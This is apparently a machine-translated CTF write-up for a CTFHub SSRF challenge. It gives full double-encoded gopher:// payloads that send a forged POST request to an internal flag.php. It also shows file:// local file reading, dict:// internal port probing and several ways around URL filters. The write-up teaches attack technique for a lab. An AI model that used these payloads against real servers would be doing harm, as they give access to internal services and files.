1.post request

First , visit index file

This paragraph means that this place exists for curl Vulnerability of request data

Two documents

You can see from the second picture , We need to /flag.php Send a POST Request package for , The content of the request package is key,key In the first picture, we have

structure POST Request package

visit flag.php page , By modifying the html The page gets the submit button , as follows

Get the submit button , take key Fill in the input box and adjust , and bp Grab the bag

After obtaining the data package, take the contents of the data package url code

Coding website ：CTF Online tools - On-line URL code |URL decode (hiencode.com)

Get the first encoding ：

POST%20/flag.php%20HTTP/1.1%0AHost%3A%20127.0.0.1%3A80%0AContent-Type%3A%20application/x-www-form-urlencoded%0AContent-Length%3A%2036%0A%20%0Akey%3De9816343438c44ed037dc74e05f02b1c

among , Need to put %0A Replace with %0D%0A , because %0A yes linux System newline character , We are Windows System , Therefore, it needs to be replaced by  %0D%0A or %0d%0a

Tips for replacement ： Copy text to txt in , utilize txt Complete the replacement

Replace it all once  

About the second encoding ：

Because we are through curl Pseudo protocol ：gopher Send request package , Therefore, a second encoding is required

The second encoding result

POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A127.0.0.1%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%250D%250AContent-Length%253A36%250D%250A%250D%250Akey%253De9816343438c44ed037dc74e05f02b1c

When the packet is ready , You can go to flag.php The file was sent

Use ：

1. link ?url=gopher://127.0.0.1:80/_

2. The result of two encodings 
POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520challenge-85c812e011304b2a.sandbox.ctfhub.com%253A10800%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A101.0%2529%2520Gecko/20100101%2520Firefox/101.0%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/avif%252Cimage/webp%252C%252A/%252A%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Czh-TW%253Bq%253D0.7%252Czh-HK%253Bq%253D0.5%252Cen-US%253Bq%253D0.3%252Cen%253Bq%253D0.2%250D%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250AOrigin%253A%2520http%253A//challenge-85c812e011304b2a.sandbox.ctfhub.com%253A10800%250D%250AConnection%253A%2520close%250D%250AReferer%253A%2520http%253A//challenge-85c812e011304b2a.sandbox.ctfhub.com%253A10800/%253Furl%253Dhttp%253A//127.0.0.1/flag.php%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250A%250D%250Akey%253D353819242683f9148b813faf1691976e

3.payload by ：

?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520challenge-85c812e011304b2a.sandbox.ctfhub.com%253A10800%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A101.0%2529%2520Gecko/20100101%2520Firefox/101.0%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/avif%252Cimage/webp%252C%252A/%252A%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Czh-TW%253Bq%253D0.7%252Czh-HK%253Bq%253D0.5%252Cen-US%253Bq%253D0.3%252Cen%253Bq%253D0.2%250D%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250AOrigin%253A%2520http%253A//challenge-85c812e011304b2a.sandbox.ctfhub.com%253A10800%250D%250AConnection%253A%2520close%250D%250AReferer%253A%2520http%253A//challenge-85c812e011304b2a.sandbox.ctfhub.com%253A10800/%253Furl%253Dhttp%253A//127.0.0.1/flag.php%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250A%250D%250Akey%253D353819242683f9148b813faf1691976e

  Add ：curl Pseudo protocol

1.gopher agreement

gopher The agreement supports sending Out GET,POST request , You can intercept get Request package and post Request package , Reconstruction conforms to gopher Request .

effect ： Can attack intranet FTP,Telnet,Redis,Memcache, You can also attack unauthorized MySQL

grammar ：

gopher://IP:Port/_{TCP/IP Data flow }


{TCP/IP Data flow }  Is the package you want to send 

 As mentioned above , I want to construct payload by 
http://challenge-f34bdf386ecf053f.sandbox.ctfhub.com:10800/?url=gopher://127.0.0.1:80/


_{TCP/IP Data flow } Namely  _POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A127.0.0.1%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%250D%250AContent-Length%253A36%250D%250A%250D%250Akey%253De9816343438c44ed037dc74e05f02b1c
（post After the request package is compiled twice ）


 Put it all together 
http://challenge-f34bdf386ecf053f.sandbox.ctfhub.com:10800/?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A127.0.0.1%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%250D%250AContent-Length%253A36%250D%250A%250D%250Akey%253De9816343438c44ed037dc74e05f02b1c

2.file The protocol and dict agreement

file The protocol realizes arbitrary file reading

?url=file:///var/www/html/index.php

dict The protocol realizes intranet port detection

?url=dict://127.0.0.1:20/info

curl Several functions of

1.curl_init()

Initialize a curl conversation , The initialized vector can be used curl_setopt(),curl_exec() and curl_close() function

$ch = curl_init();

2.curl_setopt

For more specific parameters, please visit the following connection ：

PHP curl_setopt function | Novice tutorial (runoob.com)

Set up a curl Transfer options , Use as follows

 grammar ：curl_setopt(resource $ch, int $option, mixed $value)

 With ctfhub--sstf----post Request as an example , visit index.php Source code , You can see the following code 

curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);         
// Set up url

curl_setopt($ch, CURLOPT_HEADER, 0);                     
// When enabled, the header file information will be output as a data stream 

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 
// In the use of CURLOPT_FOLLOWLOCATION Produced header In the multiple locations Continue to add user name and password information in , Even if the domain name has changed .

3.curl_exec()

perform curl conversation

4.curl_close()

close curl conversation

URL Bypass

url Bypass

[email protected] Bypass

payload: http://[email protected]/flag.php

@ The grammar of :@ The first one is access users , Next is the access address 

 2. You can't use dotted decimal ：  Use other base numbers or localhost

 IP Address hexadecimal conversion (520101.com)

Such as

3.302 

Online short address translation tool -BeJSON.com

Examination site ：url Redirection of short address ,url The purpose of short addresses is to have some longer ones in the future url To shorten the .

principle ： adopt ip Construct a shorter address , Visiting this address will show 302 state , and 302 For temporary redirection . Equivalent to the original url1 Resolve directly to ip Address , But now because of url1 It's too long to remember and use , Introduced a memorable url2, We have access to url2,url2 Directed to url1,url1 Redirect to ip Address  

4.DNS Rebinding

Look at the source code , Find bypass